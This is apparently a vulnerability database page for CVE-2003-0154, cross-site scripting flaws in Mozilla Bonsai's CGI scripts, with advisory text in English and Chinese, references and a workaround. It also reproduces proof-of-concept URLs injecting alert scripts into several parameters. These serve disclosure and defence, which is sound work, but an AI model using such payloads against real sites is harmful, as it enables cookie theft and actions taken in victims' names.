CVE-2003-0154
CVSS6.8
发布时间 :2003-04-02 00:00:00
修订时间 :2016-10-17 22:30:12
NMCOES    

[原文]Cross-site scripting vulnerabilities (XSS) in bonsai Mozilla CVS query tool allow remote attackers to execute arbitrary web script via (1) the file, root, or rev parameters to cvslog.cgi, (2) the file or root parameters to cvsblame.cgi, (3) various parameters to cvsquery.cgi, (4) the person parameter to showcheckins.cgi, (5) the module parameter to cvsqueryform.cgi, and (6) possibly other attack vectors as identified by Mozilla bug #146244.


[CNNVD]Mozilla Bonsai多个跨站脚本执行漏洞(CNNVD-200304-036)

        
        Mozilla Bonsai是一款允许用户查询CVS档案内容的工具,可以获得登记列表,登记日志等信息。
        Mozilla Bonsai多个脚本对用户提交的URL数据缺少过滤,远程攻击者可以利用这个漏洞进行跨站脚本执行攻击。
        Mozilla Bonsai包含的多个脚本对HTML,JAVASCRIPT代码缺少过滤,远程攻击者可以构建包含恶意代码的URL链接的页面,当诱使目标用户点击后,其中的恶意脚本代码就可以在用户浏览器上执行,导致用户基于认证的Cookie等信息泄露。
        

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0154
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0154
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-036
(官方数据源) CNNVD

- 其它链接及资源

http://bugzilla.mozilla.org/attachment.cgi?id=95950&action=view
(UNKNOWN)  CONFIRM  http://bugzilla.mozilla.org/attachment.cgi?id=95950&action=view
http://bugzilla.mozilla.org/attachment.cgi?id=95985&action=view
(UNKNOWN)  CONFIRM  http://bugzilla.mozilla.org/attachment.cgi?id=95985&action=view
http://bugzilla.mozilla.org/show_bug.cgi?id=146244
(UNKNOWN)  MISC  http://bugzilla.mozilla.org/show_bug.cgi?id=146244
http://bugzilla.mozilla.org/show_bug.cgi?id=163573
(UNKNOWN)  CONFIRM  http://bugzilla.mozilla.org/show_bug.cgi?id=163573
http://marc.info/?l=bugtraq&m=102980129101054&w=2
(UNKNOWN)  BUGTRAQ  20020819 Advisory: Bonsai XSS and Physical Path Revealing Vulnerabilities
http://www.debian.org/security/2003/dsa-265
(VENDOR_ADVISORY)  DEBIAN  DSA-265
http://www.iss.net/security_center/static/9920.php
(UNKNOWN)  XF  bonsai-error-message-xss(9920)
http://www.securityfocus.com/bid/5516
(VENDOR_ADVISORY)  BID  5516

- 漏洞信息

Mozilla Bonsai多个跨站脚本执行漏洞
中危 输入验证
2003-04-02 00:00:00 2005-10-20 00:00:00
远程  
        
        Mozilla Bonsai是一款允许用户查询CVS档案内容的工具,可以获得登记列表,登记日志等信息。
        Mozilla Bonsai多个脚本对用户提交的URL数据缺少过滤,远程攻击者可以利用这个漏洞进行跨站脚本执行攻击。
        Mozilla Bonsai包含的多个脚本对HTML,JAVASCRIPT代码缺少过滤,远程攻击者可以构建包含恶意代码的URL链接的页面,当诱使目标用户点击后,其中的恶意脚本代码就可以在用户浏览器上执行,导致用户基于认证的Cookie等信息泄露。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时关闭浏览器的Javascript功能。
        厂商补丁:
        Mozilla
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.mozilla.org/bonsai.html

- 漏洞信息 (21729)

Mozilla Bonsai Multiple Cross Site Scripting Vulnerabilities (EDBID:21729)
cgi webapps
2002-08-20 Verified
0 Stan Bubrouski
N/A [点击下载]
source: http://www.securityfocus.com/bid/5516/info

Multiple cross site scripting vulnerabilities have been reported for the Bonsai tool. 

An attacker may exploit this vulnerability by causing a victim user to follow a malicious link. Attacker-supplied code may execute within the context of the site hosting the vulnerable software when the malicious link is visited.

This type of vulnerability may be used to steal cookies or perform other web-based attacks. It may be possible to take actions as an user of the Bonsai system.

/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert(document.domain)</script>
/webtools/bonsai/cvslog.cgi?file=<script>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=/index.html&root=<script>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=<script>alert(document.domain)</script>
/cvsquery.cgi?branch=<script>alert(document.domain)</script>&file=<script>alert(document.domain)</script>
&date=<script>alert(document.domain)</script>
/cvsquery.cgi?module=<script>alert(document.domain)</script>&branch=&dir=&file=
&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
/showcheckins.cgi?person=<script>alert(document.domain)</script>
/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert(document.domain)</script>&branch=HEAD		

- 漏洞信息

5457
Mozilla Bonsai cvsqueryform.cgi module Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Bonsai contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "module" variables upon submission to the "cvsqueryform.cgi" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2002-08-19 2002-08-05
2002-08-19 Unknow

- 解决方案

Upgrade to the latest version by checking out a new copy via CVS, as it has been reported to fix this vulnerability. Debian Linux has released an independant patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Mozilla Bonsai Multiple Cross Site Scripting Vulnerabilities
Input Validation Error 5516
Yes No
2002-08-20 12:00:00 2009-07-11 03:56:00
Discovery credited to Stan Bubrouski <stan@ccs.neu.edu>.

- 受影响的程序版本

Mozilla Bonsai 1.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0

- 漏洞讨论

Multiple cross site scripting vulnerabilities have been reported for the Bonsai tool.

An attacker may exploit this vulnerability by causing a victim user to follow a malicious link. Attacker-supplied code may execute within the context of the site hosting the vulnerable software when the malicious link is visited.

This type of vulnerability may be used to steal cookies or perform other web-based attacks. It may be possible to take actions as an user of the Bonsai system.

- 漏洞利用

The following proof of concepts have been provided by Stan Bubrouski &lt;stan@ccs.neu.edu&gt;:

/webtools/bonsai/cvslog.cgi?file=*&amp;rev=&amp;root=&lt;script&gt;alert(document.domain)&lt;/script&gt;
/webtools/bonsai/cvslog.cgi?file=&lt;script&gt;alert(document.domain)&lt;/script&gt;
/webtools/bonsai/cvsblame.cgi?file=/index.html&amp;root=&lt;script&gt;alert(document.domain)&lt;/script&gt;
/webtools/bonsai/cvsblame.cgi?file=&lt;script&gt;alert(document.domain)&lt;/script&gt;
/cvsquery.cgi?branch=&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;file=&lt;script&gt;alert(document.domain)&lt;/script&gt;
&amp;date=&lt;script&gt;alert(document.domain)&lt;/script&gt;
/cvsquery.cgi?module=&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;branch=&amp;dir=&amp;file=
&amp;who=&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;sortby=Date&amp;hours=2&amp;date=week
/showcheckins.cgi?person=&lt;script&gt;alert(document.domain)&lt;/script&gt;
/cvsqueryform.cgi?cvsroot=/cvsroot&amp;module=&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;branch=HEAD

- 解决方案

Fixes available:


Mozilla Bonsai 1.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站